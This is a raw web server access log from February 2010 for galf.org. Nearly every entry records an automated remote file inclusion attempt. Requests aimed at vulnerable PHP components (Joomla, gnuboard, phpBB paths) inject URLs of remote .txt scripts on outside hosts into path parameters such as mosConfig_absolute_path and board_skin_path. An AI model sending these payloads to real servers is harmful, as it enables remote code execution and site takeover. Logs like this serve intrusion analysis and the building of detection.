202.150.132.139 - - [01/Feb/2010:01:06:12 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:06:45 -0800] "GET /logs/access.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:06:45 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:06:45 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:08:24 -0800] "GET /logs/access_100125.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:09:40 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:09:40 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:09:40 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:05 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:05 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:05 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:24 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:24 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:24 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:10:55 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:11:49 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:11:56 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [01/Feb/2010:01:12:03 -0800] "GET /logs/access.log%20%20/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:12:52 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:12:53 -0800] "GET /logs/access_090720.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:12:53 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:13:01 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:13:01 -0800] "GET /logs/access_091228.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:13:01 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:13:10 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:13:11 -0800] "GET /logs/access_090720.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:01:13:11 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [01/Feb/2010:01:13:21 -0800] "GET /logs/access_090803.log%20/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [01/Feb/2010:01:13:21 -0800] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [01/Feb/2010:01:13:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:14:34 -0800] "GET /logs/access_091214.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [01/Feb/2010:01:14:51 -0800] "GET /logs/access_100125.log%20%20/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:14:51 -0800] "GET /logs/access_091102.log///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:14:51 -0800] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:14:51 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:13 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:13 -0800] "GET /logs/access.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:13 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:14 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:14 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:14 -0800] "GET /logs/access.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:22 -0800] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:22 -0800] "GET /logs/access_091102.log///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:22 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:27 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:27 -0800] "GET /logs/access.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:27 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:15:33 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:15:33 -0800] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:15:33 -0800] "GET /logs/access_091102.log///components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:37 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:37 -0800] "GET /logs/access.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:37 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:58 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:58 -0800] "GET /logs/access.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:58 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:59 -0800] "GET /board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:59 -0800] "GET /logs//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:15:59 -0800] "GET /logs/access.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:06 -0800] "GET /logs/access_100125.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:12 -0800] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:12 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:13 -0800] "GET /logs/access_091102.log///components/com_forum/download.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:38 -0800] "GET //db.php?commonpath=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:38 -0800] "GET /logs///db.php?commonpath=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:38 -0800] "GET /logs/access_090921.log%20%20///db.php?commonpath=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:39 -0800] "GET /logs/access_100125.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:16:40 -0800] "GET /logs/access_100125.log//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:48 -0800] "GET /logs/access_091026.log///components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:48 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:49 -0800] "GET /logs///components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:01:16:51 -0800] "GET /logs/access_090914.log///components/com_forum/download.php?phpbb_root_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:17:47 -0800] "GET /logs/access_100125.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:17:48 -0800] "GET /logs/access_100125.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [01/Feb/2010:01:18:32 -0800] "GET /logs/access_100125.log%20%20//board/bbs//write_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [01/Feb/2010:01:18:35 -0800] "GET /logs/access_090803.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [01/Feb/2010:01:20:57 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:01:24:21 -0800] "GET /logs/access_090928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:01:24:35 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.141.56.136 - - [01/Feb/2010:01:24:41 -0800] "GET /logs/access.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:24:42 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:24:42 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:01:26:17 -0800] "GET /logs/access_100125.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:01:27:08 -0800] "GET /write_comment_update.php?board_skin_path=http://www.sswc.kr/home/bbs///idasc.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "galf.org"
82.151.132.176 - - [01/Feb/2010:01:27:08 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.sswc.kr/home/bbs///idasc.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "galf.org"
84.40.23.86 - - [01/Feb/2010:01:29:16 -0800] "GET /logs/access_100118.log/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:01:29:21 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.sswc.kr/home/bbs///idasc.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
82.151.132.176 - - [01/Feb/2010:01:29:21 -0800] "GET /write_comment_update.php?board_skin_path=http://www.sswc.kr/home/bbs///idasc.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /logs/access_100118.log%20%20/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:04 -0800] "GET /delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:55 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.172 - - [01/Feb/2010:01:30:55 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.40.23.86 - - [01/Feb/2010:01:32:01 -0800] "GET /logs/access_100125.log/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [01/Feb/2010:01:32:42 -0800] "GET /logs/access.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [01/Feb/2010:01:33:45 -0800] "GET /bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [01/Feb/2010:01:33:45 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [01/Feb/2010:01:33:46 -0800] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.240.39.222 - - [01/Feb/2010:01:33:57 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:01:33:57 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:01:33:58 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [01/Feb/2010:01:34:00 -0800] "GET /bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [01/Feb/2010:01:34:00 -0800] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [01/Feb/2010:01:34:02 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:07 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:07 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:07 -0800] "GET /logs/access_100118.log//include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:11 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:11 -0800] "GET /logs/access_100118.log//include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:01:34:11 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [01/Feb/2010:01:34:40 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [01/Feb/2010:01:37:47 -0800] "GET /logs/access.log/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.110.160.78 - - [01/Feb/2010:01:37:47 -0800] "GET /?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
194.110.160.78 - - [01/Feb/2010:01:37:47 -0800] "GET /logs/?board_skin_path=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
